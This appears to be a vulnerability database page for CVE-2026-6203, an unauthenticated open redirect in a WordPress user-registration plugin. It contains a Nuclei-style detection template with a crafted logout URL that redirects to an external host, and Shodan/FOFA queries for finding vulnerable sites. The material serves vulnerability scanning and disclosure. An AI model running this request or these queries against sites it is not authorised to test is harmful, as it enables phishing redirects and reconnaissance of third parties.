| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2026-6203 | 13 Apr 202622:25 | – | attackerkb | |
| CVE-2026-6203 | 14 Apr 202601:37 | – | circl | |
| WordPress plugin User Registration & Membership 输入验证错误漏洞 | 13 Apr 202600:00 | – | cnnvd | |
| WordPress Plugin User Registration & Membership Input Validation Error Vulnerability | 14 Apr 202600:00 | – | cnvd | |
| CVE-2026-6203 | 13 Apr 202622:25 | – | cve | |
| CVE-2026-6203 User Registration & Membership <= 5.1.4 - Unauthenticated Open Redirect via 'redirect_to_on_logout' Parameter | 13 Apr 202622:25 | – | cvelist | |
| EUVD-2026-22135 | 14 Apr 202600:31 | – | euvd | |
| CVE-2026-6203 | 13 Apr 202623:16 | – | nvd | |
| WordPress User Registration & Membership plugin <= 5.1.4 - Unauthenticated Open Redirect via 'redirect_to_on_logout' Parameter vulnerability | 14 Apr 202602:35 | – | patchstack | |
| PT-2026-32547 | 13 Apr 202600:00 | – | ptsecurity |
id: CVE-2026-6203
info:
name: User Registration & Membership WordPress plugin - Open Redirect
author: theamanrawat
severity: medium
description: |
User Registration & Membership WordPress plugin <= 5.1.4 contains an open redirect caused by insufficient validation of 'redirect_to_on_logout' parameter, letting attackers redirect users to malicious external URLs after logout, exploit requires crafted URL.
impact: |
Attackers can redirect users to malicious sites after logout, facilitating phishing attacks and user deception.
remediation: |
Update to a version later than 5.1.4 or the latest available version.
reference:
- https://patchstack.com/database/vulnerability/wordpress-user-registration-membership-plugin-5-1-4-unauthenticated-open-redirect-via-redirect-to-on-logout-parameter-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2026-6203
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2026-6203
epss-score: 0.00663
epss-percentile: 0.47222
cwe-id: CWE-601
metadata:
verified: true
max-request: 2
shodan-query: http.html:"/wp-content/plugins/user-registration/"
fofa-query: body="/wp-content/plugins/user-registration/" && title="WordPress"
tags: cve,cve2026,wp,wordpress,wp-plugin,user-registration,open-redirect
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/user-registration/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "User Registration")'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/?user-logout=true&redirect_to_on_logout=https://interact.sh"
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- "Location: https://interact.sh"
# digest: 4a0a00473045022038b679b2e1fa4eb9a23be93105fd38ebc8b44cef07674d1f439c1215e9b60b63022100a75a624d62877347854e4653faa290f9820144f60b8cb26196d0299a9c4cb229:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation